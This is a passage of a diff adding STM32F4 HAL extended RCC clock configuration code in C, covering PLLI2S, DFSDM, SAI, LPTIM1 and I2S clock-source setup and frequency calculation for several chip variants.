__HAL_RCC_SDIO_CONFIG(PeriphClkInit->SdioClockSelection); + } + /*--------------------------------------------------------------------------*/ + + /*-------------------------------------- PLLI2S Configuration --------------*/ + /* PLLI2S is configured when a peripheral will use it as source clock : I2S on APB1 or + I2S on APB2*/ + if((plli2sused == 1U) || (PeriphClkInit->PeriphClockSelection == RCC_PERIPHCLK_PLLI2S)) + { + /* Disable the PLLI2S */ + __HAL_RCC_PLLI2S_DISABLE(); + /* Get tick */ + tickstart = HAL_GetTick(); + /* Wait till PLLI2S is disabled */ + while(__HAL_RCC_GET_FLAG(RCC_FLAG_PLLI2SRDY) != RESET) + { + if((HAL_GetTick() - tickstart ) > PLLI2S_TIMEOUT_VALUE) + { + /* return in case of Timeout detected */ + return HAL_TIMEOUT; + } + } + + /* check for common PLLI2S Parameters */ + assert_param(IS_RCC_PLLI2SCLKSOURCE(PeriphClkInit->PLLI2SSelection)); + assert_param(IS_RCC_PLLI2SM_VALUE(PeriphClkInit->PLLI2S.PLLI2SM)); + assert_param(IS_RCC_PLLI2SN_VALUE(PeriphClkInit->PLLI2S.PLLI2SN)); + /*-------------------- Set the PLL I2S clock -----------------------------*/ + __HAL_RCC_PLL_I2S_CONFIG(PeriphClkInit->PLLI2SSelection); + + /*------- In Case of PLLI2S is selected as source clock for I2S ----------*/ + if(((((PeriphClkInit->PeriphClockSelection) & RCC_PERIPHCLK_I2S_APB1) == RCC_PERIPHCLK_I2S_APB1) && (PeriphClkInit->I2sApb1ClockSelection == RCC_I2SAPB1CLKSOURCE_PLLI2S)) || + ((((PeriphClkInit->PeriphClockSelection) & RCC_PERIPHCLK_I2S_APB2) == RCC_PERIPHCLK_I2S_APB2) && (PeriphClkInit->I2sApb2ClockSelection == RCC_I2SAPB2CLKSOURCE_PLLI2S)) || + ((((PeriphClkInit->PeriphClockSelection) & RCC_PERIPHCLK_CLK48) == RCC_PERIPHCLK_CLK48) && (PeriphClkInit->Clk48ClockSelection == RCC_CLK48CLKSOURCE_PLLI2SQ)) || + ((((PeriphClkInit->PeriphClockSelection) & RCC_PERIPHCLK_SDIO) == RCC_PERIPHCLK_SDIO) && (PeriphClkInit->SdioClockSelection == RCC_SDIOCLKSOURCE_CLK48) && (PeriphClkInit->Clk48ClockSelection == RCC_CLK48CLKSOURCE_PLLI2SQ))) + { + /* check for Parameters */ + assert_param(IS_RCC_PLLI2SR_VALUE(PeriphClkInit->PLLI2S.PLLI2SR)); + assert_param(IS_RCC_PLLI2SQ_VALUE(PeriphClkInit->PLLI2S.PLLI2SQ)); + + /* Configure the PLLI2S division factors */ + /* PLLI2S_VCO = f(VCO clock) = f(PLLI2S clock input) * (PLLI2SN/PLLI2SM)*/ + /* I2SCLK = f(PLLI2S clock output) = f(VCO clock) / PLLI2SR */ + __HAL_RCC_PLLI2S_CONFIG(PeriphClkInit->PLLI2S.PLLI2SM, PeriphClkInit->PLLI2S.PLLI2SN , PeriphClkInit->PLLI2S.PLLI2SQ, PeriphClkInit->PLLI2S.PLLI2SR); + } + +#if defined(STM32F413xx) || defined(STM32F423xx) + /*------- In Case of PLLI2S is selected as source clock for SAI ----------*/ + if(((((PeriphClkInit->PeriphClockSelection) & RCC_PERIPHCLK_SAIA) == RCC_PERIPHCLK_SAIA) && (PeriphClkInit->SaiAClockSelection == RCC_SAIACLKSOURCE_PLLI2SR)) || + ((((PeriphClkInit->PeriphClockSelection) & RCC_PERIPHCLK_SAIB) == RCC_PERIPHCLK_SAIB) && (PeriphClkInit->SaiBClockSelection == RCC_SAIBCLKSOURCE_PLLI2SR))) + { + /* Check for PLLI2S Parameters */ + assert_param(IS_RCC_PLLI2SR_VALUE(PeriphClkInit->PLLI2S.PLLI2SR)); + /* Check for PLLI2S/DIVR parameters */ + assert_param(IS_RCC_PLLI2S_DIVR_VALUE(PeriphClkInit->PLLI2SDivR)); + + /* Read PLLI2SQ value from PLLI2SCFGR register (this value is not needed for SAI configuration) */ + plli2sq = ((RCC->PLLI2SCFGR & RCC_PLLI2SCFGR_PLLI2SQ) >> RCC_PLLI2SCFGR_PLLI2SQ_Pos); + /* Configure the PLLI2S division factors */ + /* PLLI2S_VCO Input = PLL_SOURCE/PLLI2SM */ + /* PLLI2S_VCO Output = PLLI2S_VCO Input * PLLI2SN */ + /* SAI_CLK(first level) = PLLI2S_VCO Output/PLLI2SQ */ + __HAL_RCC_PLLI2S_CONFIG(PeriphClkInit->PLLI2S.PLLI2SM, PeriphClkInit->PLLI2S.PLLI2SN, plli2sq, PeriphClkInit->PLLI2S.PLLI2SR); + + /* SAI_CLK_x = SAI_CLK(first level)/PLLI2SDIVR */ + __HAL_RCC_PLLI2S_PLLSAICLKDIVR_CONFIG(PeriphClkInit->PLLI2SDivR); + } +#endif /* STM32F413xx || STM32F423xx */ + + /*----------------- In Case of PLLI2S is just selected ------------------*/ + if((PeriphClkInit->PeriphClockSelection & RCC_PERIPHCLK_PLLI2S) == RCC_PERIPHCLK_PLLI2S) + { + /* Check for Parameters */ + assert_param(IS_RCC_PLLI2SR_VALUE(PeriphClkInit->PLLI2S.PLLI2SR)); + assert_param(IS_RCC_PLLI2SQ_VALUE(PeriphClkInit->PLLI2S.PLLI2SQ)); + + /* Configure the PLLI2S division factors */ + /* PLLI2S_VCO = f(VCO clock) = f(PLLI2S clock input) * (PLLI2SN/PLLI2SM)*/ + /* SPDIFRXCLK = f(PLLI2S clock output) = f(VCO clock) / PLLI2SP */ + __HAL_RCC_PLLI2S_CONFIG(PeriphClkInit->PLLI2S.PLLI2SM, PeriphClkInit->PLLI2S.PLLI2SN , PeriphClkInit->PLLI2S.PLLI2SQ, PeriphClkInit->PLLI2S.PLLI2SR); + } + + /* Enable the PLLI2S */ + __HAL_RCC_PLLI2S_ENABLE(); + /* Get tick */ + tickstart = HAL_GetTick(); + /* Wait till PLLI2S is ready */ + while(__HAL_RCC_GET_FLAG(RCC_FLAG_PLLI2SRDY) == RESET) + { + if((HAL_GetTick() - tickstart ) > PLLI2S_TIMEOUT_VALUE) + { + /* return in case of Timeout detected */ + return HAL_TIMEOUT; + } + } + } + /*--------------------------------------------------------------------------*/ + + /*-------------------- DFSDM1 clock source configuration -------------------*/ + if(((PeriphClkInit->PeriphClockSelection) & RCC_PERIPHCLK_DFSDM1) == RCC_PERIPHCLK_DFSDM1) + { + /* Check the parameters */ + assert_param(IS_RCC_DFSDM1CLKSOURCE(PeriphClkInit->Dfsdm1ClockSelection)); + + /* Configure the DFSDM1 interface clock source */ + __HAL_RCC_DFSDM1_CONFIG(PeriphClkInit->Dfsdm1ClockSelection); + } + /*--------------------------------------------------------------------------*/ + + /*-------------------- DFSDM1 Audio clock source configuration -------------*/ + if(((PeriphClkInit->PeriphClockSelection) & RCC_PERIPHCLK_DFSDM1_AUDIO) == RCC_PERIPHCLK_DFSDM1_AUDIO) + { + /* Check the parameters */ + assert_param(IS_RCC_DFSDM1AUDIOCLKSOURCE(PeriphClkInit->Dfsdm1AudioClockSelection)); + + /* Configure the DFSDM1 Audio interface clock source */ + __HAL_RCC_DFSDM1AUDIO_CONFIG(PeriphClkInit->Dfsdm1AudioClockSelection); + } + /*--------------------------------------------------------------------------*/ + +#if defined(STM32F413xx) || defined(STM32F423xx) + /*-------------------- DFSDM2 clock source configuration -------------------*/ + if(((PeriphClkInit->PeriphClockSelection) & RCC_PERIPHCLK_DFSDM2) == RCC_PERIPHCLK_DFSDM2) + { + /* Check the parameters */ + assert_param(IS_RCC_DFSDM2CLKSOURCE(PeriphClkInit->Dfsdm2ClockSelection)); + + /* Configure the DFSDM1 interface clock source */ + __HAL_RCC_DFSDM2_CONFIG(PeriphClkInit->Dfsdm2ClockSelection); + } + /*--------------------------------------------------------------------------*/ + + /*-------------------- DFSDM2 Audio clock source configuration -------------*/ + if(((PeriphClkInit->PeriphClockSelection) & RCC_PERIPHCLK_DFSDM2_AUDIO) == RCC_PERIPHCLK_DFSDM2_AUDIO) + { + /* Check the parameters */ + assert_param(IS_RCC_DFSDM2AUDIOCLKSOURCE(PeriphClkInit->Dfsdm2AudioClockSelection)); + + /* Configure the DFSDM1 Audio interface clock source */ + __HAL_RCC_DFSDM2AUDIO_CONFIG(PeriphClkInit->Dfsdm2AudioClockSelection); + } + /*--------------------------------------------------------------------------*/ + + /*---------------------------- LPTIM1 Configuration ------------------------*/ + if(((PeriphClkInit->PeriphClockSelection) & RCC_PERIPHCLK_LPTIM1) == RCC_PERIPHCLK_LPTIM1) + { + /* Check the parameters */ + assert_param(IS_RCC_LPTIM1CLKSOURCE(PeriphClkInit->Lptim1ClockSelection)); + + /* Configure the LPTIM1 clock source */ + __HAL_RCC_LPTIM1_CONFIG(PeriphClkInit->Lptim1ClockSelection); + } + /*--------------------------------------------------------------------------*/ +#endif /* STM32F413xx || STM32F423xx */ + + return HAL_OK; +} + +/** + * @brief Get the RCC_PeriphCLKInitTypeDef according to the internal + * RCC configuration registers. + * @param PeriphClkInit pointer to an RCC_PeriphCLKInitTypeDef structure that + * will be configured. + * @retval None + */ +void HAL_RCCEx_GetPeriphCLKConfig(RCC_PeriphCLKInitTypeDef *PeriphClkInit) +{ + uint32_t tempreg; + + /* Set all possible values for the extended clock type parameter------------*/ +#if defined(STM32F413xx) || defined(STM32F423xx) + PeriphClkInit->PeriphClockSelection = RCC_PERIPHCLK_I2S_APB1 | RCC_PERIPHCLK_I2S_APB2 |\ + RCC_PERIPHCLK_TIM | RCC_PERIPHCLK_RTC |\ + RCC_PERIPHCLK_FMPI2C1 | RCC_PERIPHCLK_CLK48 |\ + RCC_PERIPHCLK_SDIO | RCC_PERIPHCLK_DFSDM1 |\ + RCC_PERIPHCLK_DFSDM1_AUDIO | RCC_PERIPHCLK_DFSDM2 |\ + RCC_PERIPHCLK_DFSDM2_AUDIO | RCC_PERIPHCLK_LPTIM1 |\ + RCC_PERIPHCLK_SAIA | RCC_PERIPHCLK_SAIB; +#else /* STM32F412Zx || STM32F412Vx || STM32F412Rx || STM32F412Cx */ + PeriphClkInit->PeriphClockSelection = RCC_PERIPHCLK_I2S_APB1 | RCC_PERIPHCLK_I2S_APB2 |\ + RCC_PERIPHCLK_TIM | RCC_PERIPHCLK_RTC |\ + RCC_PERIPHCLK_FMPI2C1 | RCC_PERIPHCLK_CLK48 |\ + RCC_PERIPHCLK_SDIO | RCC_PERIPHCLK_DFSDM1 |\ + RCC_PERIPHCLK_DFSDM1_AUDIO; +#endif /* STM32F413xx || STM32F423xx */ + + + + /* Get the PLLI2S Clock configuration --------------------------------------*/ + PeriphClkInit->PLLI2S.PLLI2SM = (uint32_t)((RCC->PLLI2SCFGR & RCC_PLLI2SCFGR_PLLI2SM) >> RCC_PLLI2SCFGR_PLLI2SM_Pos); + PeriphClkInit->PLLI2S.PLLI2SN = (uint32_t)((RCC->PLLI2SCFGR & RCC_PLLI2SCFGR_PLLI2SN) >> RCC_PLLI2SCFGR_PLLI2SN_Pos); + PeriphClkInit->PLLI2S.PLLI2SQ = (uint32_t)((RCC->PLLI2SCFGR & RCC_PLLI2SCFGR_PLLI2SQ) >> RCC_PLLI2SCFGR_PLLI2SQ_Pos); + PeriphClkInit->PLLI2S.PLLI2SR = (uint32_t)((RCC->PLLI2SCFGR & RCC_PLLI2SCFGR_PLLI2SR) >> RCC_PLLI2SCFGR_PLLI2SR_Pos); +#if defined(STM32F413xx) || defined(STM32F423xx) + /* Get the PLL/PLLI2S division factors -------------------------------------*/ + PeriphClkInit->PLLI2SDivR = (uint32_t)((RCC->DCKCFGR & RCC_DCKCFGR_PLLI2SDIVR) >> RCC_DCKCFGR_PLLI2SDIVR_Pos); + PeriphClkInit->PLLDivR = (uint32_t)((RCC->DCKCFGR & RCC_DCKCFGR_PLLDIVR) >> RCC_DCKCFGR_PLLDIVR_Pos); +#endif /* STM32F413xx || STM32F423xx */ + + /* Get the I2S APB1 clock configuration ------------------------------------*/ + PeriphClkInit->I2sApb1ClockSelection = __HAL_RCC_GET_I2S_APB1_SOURCE(); + + /* Get the I2S APB2 clock configuration ------------------------------------*/ + PeriphClkInit->I2sApb2ClockSelection = __HAL_RCC_GET_I2S_APB2_SOURCE(); + + /* Get the RTC Clock configuration -----------------------------------------*/ + tempreg = (RCC->CFGR & RCC_CFGR_RTCPRE); + PeriphClkInit->RTCClockSelection = (uint32_t)((tempreg) | (RCC->BDCR & RCC_BDCR_RTCSEL)); + + /* Get the FMPI2C1 clock configuration -------------------------------------*/ + PeriphClkInit->Fmpi2c1ClockSelection = __HAL_RCC_GET_FMPI2C1_SOURCE(); + + /* Get the CLK48 clock configuration ---------------------------------------*/ + PeriphClkInit->Clk48ClockSelection = __HAL_RCC_GET_CLK48_SOURCE(); + + /* Get the SDIO clock configuration ----------------------------------------*/ + PeriphClkInit->SdioClockSelection = __HAL_RCC_GET_SDIO_SOURCE(); + + /* Get the DFSDM1 clock configuration --------------------------------------*/ + PeriphClkInit->Dfsdm1ClockSelection = __HAL_RCC_GET_DFSDM1_SOURCE(); + + /* Get the DFSDM1 Audio clock configuration --------------------------------*/ + PeriphClkInit->Dfsdm1AudioClockSelection = __HAL_RCC_GET_DFSDM1AUDIO_SOURCE(); + +#if defined(STM32F413xx) || defined(STM32F423xx) + /* Get the DFSDM2 clock configuration --------------------------------------*/ + PeriphClkInit->Dfsdm2ClockSelection = __HAL_RCC_GET_DFSDM2_SOURCE(); + + /* Get the DFSDM2 Audio clock configuration --------------------------------*/ + PeriphClkInit->Dfsdm2AudioClockSelection = __HAL_RCC_GET_DFSDM2AUDIO_SOURCE(); + + /* Get the LPTIM1 clock configuration --------------------------------------*/ + PeriphClkInit->Lptim1ClockSelection = __HAL_RCC_GET_LPTIM1_SOURCE(); + + /* Get the SAI1 Block Aclock configuration ---------------------------------*/ + PeriphClkInit->SaiAClockSelection = __HAL_RCC_GET_SAI_BLOCKA_SOURCE(); + + /* Get the SAI1 Block B clock configuration --------------------------------*/ + PeriphClkInit->SaiBClockSelection = __HAL_RCC_GET_SAI_BLOCKB_SOURCE(); +#endif /* STM32F413xx || STM32F423xx */ + + /* Get the TIM Prescaler configuration -------------------------------------*/ + if ((RCC->DCKCFGR & RCC_DCKCFGR_TIMPRE) == RESET) + { + PeriphClkInit->TIMPresSelection = RCC_TIMPRES_DESACTIVATED; + } + else + { + PeriphClkInit->TIMPresSelection = RCC_TIMPRES_ACTIVATED; + } +} + +/** + * @brief Return the peripheral clock frequency for a given peripheral(I2S..) + * @note Return 0 if peripheral clock identifier not managed by this API + * @param PeriphClk Peripheral clock identifier + * This parameter can be one of the following values: + * @arg RCC_PERIPHCLK_I2S_APB1: I2S APB1 peripheral clock + * @arg RCC_PERIPHCLK_I2S_APB2: I2S APB2 peripheral clock + * @retval Frequency in KHz + */ +uint32_t HAL_RCCEx_GetPeriphCLKFreq(uint32_t PeriphClk) +{ + /* This variable used to store the I2S clock frequency (value in Hz) */ + uint32_t frequency = 0U; + /* This variable used to store the VCO Input (value in Hz) */ + uint32_t vcoinput = 0U; + uint32_t srcclk = 0U; + /* This variable used to store the VCO Output (value in Hz) */ + uint32_t vcooutput = 0U; + switch (PeriphClk) + { + case RCC_PERIPHCLK_I2S_APB1: + { + /* Get the current I2S source */ + srcclk = __HAL_RCC_GET_I2S_APB1_SOURCE(); + switch (srcclk) + { + /* Check if I2S clock selection is External clock mapped on the I2S_CKIN pin used as I2S clock */ + case RCC_I2SAPB1CLKSOURCE_EXT: + { + /* Set the I2S clock to the external clock value */ + frequency = EXTERNAL_CLOCK_VALUE; + break; + } + /* Check if I2S clock selection is PLLI2S VCO output clock divided by PLLI2SR used as I2S clock */ + case RCC_I2SAPB1CLKSOURCE_PLLI2S: + { + if((RCC->PLLI2SCFGR & RCC_PLLI2SCFGR_PLLI2SSRC) == RCC_PLLI2SCFGR_PLLI2SSRC) + { + /* Get the I2S source clock value */ + vcoinput = (uint32_t)(EXTERNAL_CLOCK_VALUE / (uint32_t)(RCC->PLLI2SCFGR & RCC_PLLI2SCFGR_PLLI2SM)); + } + else + { + /* Configure the PLLI2S division factor */ + /* PLLI2S_VCO Input = PLL_SOURCE/PLLI2SM */ + if((RCC->PLLCFGR & RCC_PLLCFGR_PLLSRC) == RCC_PLLSOURCE_HSE) + { + /* Get the I2S source clock value */ + vcoinput = (uint32_t)(HSE_VALUE / (uint32_t)(RCC->PLLI2SCFGR & RCC_PLLI2SCFGR_PLLI2SM)); + } + else + { + /* Get the I2S source clock value */ + vcoinput = (uint32_t)(HSI_VALUE / (uint32_t)(RCC->PLLI2SCFGR & RCC_PLLI2SCFGR_PLLI2SM)); + } + } + /* PLLI2S_VCO Output = PLLI2S_VCO Input * PLLI2SN */ + vcooutput = (uint32_t)(vcoinput * (((RCC->PLLI2SCFGR & RCC_PLLI2SCFGR_PLLI2SN) >> 6U) & (RCC_PLLI2SCFGR_PLLI2SN >> 6U))); + /* I2S_CLK = PLLI2S_VCO Output/PLLI2SR */ + frequency = (uint32_t)(vcooutput /(((RCC->PLLI2SCFGR & RCC_PLLI2SCFGR_PLLI2SR) >> 28U) & (RCC_PLLI2SCFGR_PLLI2SR >> 28U))); + break; + } + /* Check if I2S clock selection is PLL VCO Output divided by PLLR used as I2S clock */ + case RCC_I2SAPB1CLKSOURCE_PLLR: + { + /* Configure the PLL division factor R */ + /* PLL_VCO Input = PLL_SOURCE/PLLM */ + if((RCC->PLLCFGR & RCC_PLLCFGR_PLLSRC) == RCC_PLLSOURCE_HSE) + { + /* Get the I2S source clock value */ + vcoinput = (uint32_t)(HSE_VALUE / (uint32_t)(RCC->PLLCFGR & RCC_PLLCFGR_PLLM)); + } + else + { + /* Get the I2S source clock value */ + vcoinput = (uint32_t)(HSI_VALUE / (uint32_t)(RCC->PLLCFGR & RCC_PLLCFGR_PLLM)); + } + + /* PLL_VCO Output = PLL_VCO Input * PLLN */ + vcooutput = (uint32_t)(vcoinput * (((RCC->PLLCFGR & RCC_PLLCFGR_PLLN) >> 6U) & (RCC_PLLCFGR_PLLN >> 6U))); + /* I2S_CLK = PLL_VCO Output/PLLR */ + frequency = (uint32_t)(vcooutput /(((RCC->PLLCFGR & RCC_PLLCFGR_PLLR) >> 28U) & (RCC_PLLCFGR_PLLR >> 28U))); + break; + } + /* Check if I2S clock selection is HSI or HSE depending from PLL source Clock */ + case RCC_I2SAPB1CLKSOURCE_PLLSRC: + { + if((RCC->PLLCFGR & RCC_PLLCFGR_PLLSRC) == RCC_PLLSOURCE_HSE) + { + frequency = HSE_VALUE; + } + else + { + frequency = HSI_VALUE; + } + break; + } + /* Clock not enabled for I2S*/ + default: + { + frequency = 0U; + break; + } + } + break; + } + case RCC_PERIPHCLK_I2S_APB2: + { + /* Get the current I2S source */ + srcclk = __HAL_RCC_GET_I2S_APB2_SOURCE(); + switch (srcclk) + { + /* Check if I2S clock selection is External clock mapped on the I2S_CKIN pin used as I2S clock */ + case RCC_I2SAPB2CLKSOURCE_EXT: + { + /* Set the I2S clock to the external clock value */ + frequency = EXTERNAL_CLOCK_VALUE; + break; + } + /* Check if I2S clock selection is PLLI2S VCO output clock divided by PLLI2SR used as I2S clock */ + case RCC_I2SAPB2CLKSOURCE_PLLI2S: + { + if((RCC->PLLI2SCFGR & RCC_PLLI2SCFGR_PLLI2SSRC) == RCC_PLLI2SCFGR_PLLI2SSRC) + { + /* Get the I2S source clock value */ + vcoinput = (uint32_t)(EXTERNAL_CLOCK_VALUE / (uint32_t)(RCC->PLLI2SCFGR & RCC_PLLI2SCFGR_PLLI2SM)); + } + else + { + /* Configure the PLLI2S division factor */ + /* PLLI2S_VCO Input = PLL_SOURCE/PLLI2SM */ + if((RCC->PLLCFGR & RCC_PLLCFGR_PLLSRC) == RCC_PLLSOURCE_HSE) + { + /* Get the I2S source clock value */ + vcoinput = (uint32_t)(HSE_VALUE / (uint32_t)(RCC->PLLI2SCFGR & RCC_PLLI2SCFGR_PLLI2SM)); + } + else + { + /* Get the I2S source clock value */ + vcoinput = (uint32_t)(HSI_VALUE / (uint32_t)(RCC->PLLI2SCFGR & RCC_PLLI2SCFGR_PLLI2SM)); + } + } + /* PLLI2S_VCO Output = PLLI2S_VCO Input * PLLI2SN */ + vcooutput = (uint32_t)(vcoinput * (((RCC->PLLI2SCFGR & RCC_PLLI2SCFGR_PLLI2SN) >> 6U) & (RCC_PLLI2SCFGR_PLLI2SN >> 6U))); + /* I2S_CLK = PLLI2S_VCO Output/PLLI2SR */ + frequency = (uint32_t)(vcooutput /(((RCC->PLLI2SCFGR & RCC_PLLI2SCFGR_PLLI2SR) >> 28U) & (RCC_PLLI2SCFGR_PLLI2SR >> 28U))); + break; + } + /* Check if I2S clock selection is PLL VCO Output divided by PLLR used as I2S clock */ + case RCC_I2SAPB2CLKSOURCE_PLLR: + { + /* Configure the PLL division factor R */ + /* PLL_VCO Input = PLL_SOURCE/PLLM */ + if((RCC->PLLCFGR & RCC_PLLCFGR_PLLSRC) == RCC_PLLSOURCE_HSE) + { + /* Get the I2S source clock value */ + vcoinput = (uint32_t)(HSE_VALUE / (uint32_t)(RCC->PLLCFGR & RCC_PLLCFGR_PLLM)); + } + else + { + /* Get the I2S source clock value */ + vcoinput = (uint32_t)(HSI_VALUE / (uint32_t)(RCC->PLLCFGR & RCC_PLLCFGR_PLLM)); + } + + /* PLL_VCO Output = PLL_VCO Input * PLLN */ + vcooutput = (uint32_t)(vcoinput * (((RCC->PLLCFGR & RCC_PLLCFGR_PLLN) >> 6U) & (RCC_PLLCFGR_PLLN >> 6U))); + /* I2S_CLK = PLL_VCO Output/PLLR */ + frequency = (uint32_t)(vcooutput /(((RCC->PLLCFGR & RCC_PLLCFGR_PLLR) >> 28U) & (RCC_PLLCFGR_PLLR >> 28U))); + break; + } + /* Check if I2S clock selection is HSI or HSE depending from PLL source Clock */ + case RCC_I2SAPB2CLKSOURCE_PLLSRC: + { + if((RCC->PLLCFGR & RCC_PLLCFGR_PLLSRC) == RCC_PLLSOURCE_HSE) + { + frequency = HSE_VALUE; + } + else + { + frequency = HSI_VALUE; + } + break; + } + /* Clock not enabled for I2S*/ + default: + { + frequency = 0U; + break; + } + } + break; + } + } + return frequency; +} +#endif /* STM32F412Zx || STM32F412Vx || STM32F412Rx || STM32F412Cx || STM32F413xx || STM32F423xx */ + +#if defined(STM32F410Tx) || defined(STM32F410Cx) || defined(STM32F410Rx) +/** + * @brief Initializes the RCC extended peripherals clocks according to the specified parameters in the + * RCC_PeriphCLKInitTypeDef. + * @param PeriphClkInit pointer to an RCC_PeriphCLKInitTypeDef structure that + * contains the configuration information for the Extended Peripherals clocks(I2S and RTC clocks). + * + * @note A caution to be taken when HAL_RCCEx_PeriphCLKConfig() is used to select RTC clock selection, in this case + * the Reset of Backup domain will be applied in order to modify the RTC Clock source as consequence all backup + * domain (RTC and RCC_BDCR register expect BKPSRAM) will be reset + * + * @retval HAL status + */ +HAL_StatusTypeDef HAL_RCCEx_PeriphCLKConfig(RCC_PeriphCLKInitTypeDef *PeriphClkInit) +{ + uint32_t tickstart = 0U; + uint32_t tmpreg1 = 0U; + + /* Check the parameters */ + assert_param(IS_RCC_PERIPHCLOCK(PeriphClkInit->PeriphClockSelection)); + + /*---------------------------- RTC configuration ---------------------------*/ + if(((PeriphClkInit->PeriphClockSelection) & RCC_PERIPHCLK_RTC) == (RCC_PERIPHCLK_RTC)) + { + /* Check for RTC Parameters used to output RTCCLK */ + assert_param(IS_RCC_RTCCLKSOURCE(PeriphClkInit->RTCClockSelection)); + + /* Enable Power Clock*/ + __HAL_RCC_PWR_CLK_ENABLE(); + + /* Enable write access to Backup domain */ + PWR->CR |= PWR_CR_DBP; + + /* Get tick */ + tickstart = HAL_GetTick(); + + while((PWR->CR & PWR_CR_DBP) == RESET) + { + if((HAL_GetTick() - tickstart ) > RCC_DBP_TIMEOUT_VALUE) + { + return HAL_TIMEOUT; + } + } + /* Reset the Backup domain only if the RTC Clock source selection is modified from reset value */ + tmpreg1 = (RCC->BDCR & RCC_BDCR_RTCSEL); + if((tmpreg1 != 0x00000000U) && ((tmpreg1) != (PeriphClkInit->RTCClockSelection & RCC_BDCR_RTCSEL))) + { + /* Store the content of BDCR register before the reset of Backup Domain */ + tmpreg1 = (RCC->BDCR & ~(RCC_BDCR_RTCSEL)); + /* RTC Clock selection can be changed only if the Backup Domain is reset */ + __HAL_RCC_BACKUPRESET_FORCE(); + __HAL_RCC_BACKUPRESET_RELEASE(); + /* Restore the Content of BDCR register */ + RCC->BDCR = tmpreg1; + + /* Wait for LSE reactivation if LSE was enable prior to Backup Domain reset */ + if(HAL_IS_BIT_SET(RCC->BDCR, RCC_BDCR_LSEON)) + { + /* Get tick */ + tickstart = HAL_GetTick(); + + /* Wait till LSE is ready */ + while(__HAL_RCC_GET_FLAG(RCC_FLAG_LSERDY) == RESET) + { + if((HAL_GetTick() - tickstart ) > RCC_LSE_TIMEOUT_VALUE) + { + return HAL_TIMEOUT; + } + } + } + } + __HAL_RCC_RTC_CONFIG(PeriphClkInit->RTCClockSelection); + } + /*--------------------------------------------------------------------------*/ + + /*---------------------------- TIM configuration ---------------------------*/ + if(((PeriphClkInit->PeriphClockSelection) & RCC_PERIPHCLK_TIM) == (RCC_PERIPHCLK_TIM)) + { + __HAL_RCC_TIMCLKPRESCALER(PeriphClkInit->TIMPresSelection); + } + /*--------------------------------------------------------------------------*/ + + /*---------------------------- FMPI2C1 Configuration -----------------------*/ + if(((PeriphClkInit->PeriphClockSelection) & RCC_PERIPHCLK_FMPI2C1) == RCC_PERIPHCLK_FMPI2C1) + { + /* Check the parameters */ + assert_param(IS_RCC_FMPI2C1CLKSOURCE(PeriphClkInit->Fmpi2c1ClockSelection)); + + /* Configure the FMPI2C1 clock source */ + __HAL_RCC_FMPI2C1_CONFIG(PeriphClkInit->Fmpi2c1ClockSelection); + } + /*--------------------------------------------------------------------------*/ + + /*---------------------------- LPTIM1 Configuration ------------------------*/ + if(((PeriphClkInit->PeriphClockSelection) & RCC_PERIPHCLK_LPTIM1) == RCC_PERIPHCLK_LPTIM1) + { + /* Check the parameters */ + assert_param(IS_RCC_LPTIM1CLKSOURCE(PeriphClkInit->Lptim1ClockSelection)); + + /* Configure the LPTIM1 clock source */ + __HAL_RCC_LPTIM1_CONFIG(PeriphClkInit->Lptim1ClockSelection); + } + + /*---------------------------- I2S Configuration ---------------------------*/ + if(((PeriphClkInit->PeriphClockSelection) & RCC_PERIPHCLK_I2S) == RCC_PERIPHCLK_I2S) + { + /* Check the parameters */ + assert_param(IS_RCC_I2SAPBCLKSOURCE(PeriphClkInit->I2SClockSelection)); + + /* Configure the I2S clock source */ + __HAL_RCC_I2S_CONFIG(PeriphClkInit->I2SClockSelection); + } + + return HAL_OK; +} + +/** + * @brief Configures the RCC_OscInitStruct according to the internal + * RCC configuration registers. + * @param PeriphClkInit pointer to an RCC_PeriphCLKInitTypeDef structure that + * will be configured. + * @retval None + */ +void HAL_RCCEx_GetPeriphCLKConfig(RCC_PeriphCLKInitTypeDef *PeriphClkInit) +{ + uint32_t tempreg; + + /* Set all possible values for the extended clock type parameter------------*/ + PeriphClkInit->PeriphClockSelection = RCC_PERIPHCLK_FMPI2C1 | RCC_PERIPHCLK_LPTIM1 | RCC_PERIPHCLK_TIM | RCC_PERIPHCLK_RTC; + + tempreg = (RCC->CFGR & RCC_CFGR_RTCPRE); + PeriphClkInit->RTCClockSelection = (uint32_t)((tempreg) | (RCC->BDCR & RCC_BDCR_RTCSEL)); + + if ((RCC->DCKCFGR & RCC_DCKCFGR_TIMPRE) == RESET) + { + PeriphClkInit->TIMPresSelection = RCC_TIMPRES_DESACTIVATED; + } + else + { + PeriphClkInit->TIMPresSelection = RCC_TIMPRES_ACTIVATED; + } + /* Get the FMPI2C1 clock configuration -------------------------------------*/ + PeriphClkInit->Fmpi2c1ClockSelection = __HAL_RCC_GET_FMPI2C1_SOURCE(); + + /* Get the I2S clock configuration -----------------------------------------*/ + PeriphClkInit->I2SClockSelection = __HAL_RCC_GET_I2S_SOURCE(); + + +} +/** + * @brief Return the peripheral clock frequency for a given peripheral(SAI..) + * @note Return 0 if peripheral clock identifier not managed by this API + * @param PeriphClk Peripheral clock identifier + * This parameter can be one of the following values: + * @arg RCC_PERIPHCLK_I2S: I2S peripheral clock + * @retval Frequency in KHz + */ +uint32_t HAL_RCCEx_GetPeriphCLKFreq(uint32_t PeriphClk) +{ + /* This variable used to store the I2S clock frequency (value in Hz) */ + uint32_t frequency = 0U; + /* This variable used to store the VCO Input (value in Hz) */ + uint32_t vcoinput = 0U; + uint32_t srcclk = 0U; + /* This variable used to store the VCO Output (value in Hz) */ + uint32_t vcooutput = 0U; + switch (PeriphClk) + { + case RCC_PERIPHCLK_I2S: + { + /* Get the current I2S source */ + srcclk = __HAL_RCC_GET_I2S_SOURCE(); + switch (srcclk) + { + /* Check if I2S clock selection is External clock mapped on the I2S_CKIN pin used as I2S clock */ + case RCC_I2SAPBCLKSOURCE_EXT: + { + /* Set the I2S clock to the external clock value */ + frequency = EXTERNAL_CLOCK_VALUE; + break; + } + /* Check if I2S clock selection is PLL VCO Output divided by PLLR used as I2S clock */ + case RCC_I2SAPBCLKSOURCE_PLLR: + { + /* Configure the PLL division factor R */ + /* PLL_VCO Input = PLL_SOURCE/PLLM */ + if((RCC->PLLCFGR & RCC_PLLCFGR_PLLSRC) == RCC_PLLSOURCE_HSE) + { + /* Get the I2S source clock value */ + vcoinput = (uint32_t)(HSE_VALUE / (uint32_t)(RCC->PLLCFGR & RCC_PLLCFGR_PLLM)); + } + else + { + /* Get the I2S source clock value */ + vcoinput = (uint32_t)(HSI_VALUE / (uint32_t)(RCC->PLLCFGR & RCC_PLLCFGR_PLLM)); + } + + /* PLL_VCO Output = PLL_VCO Input * PLLN */ + 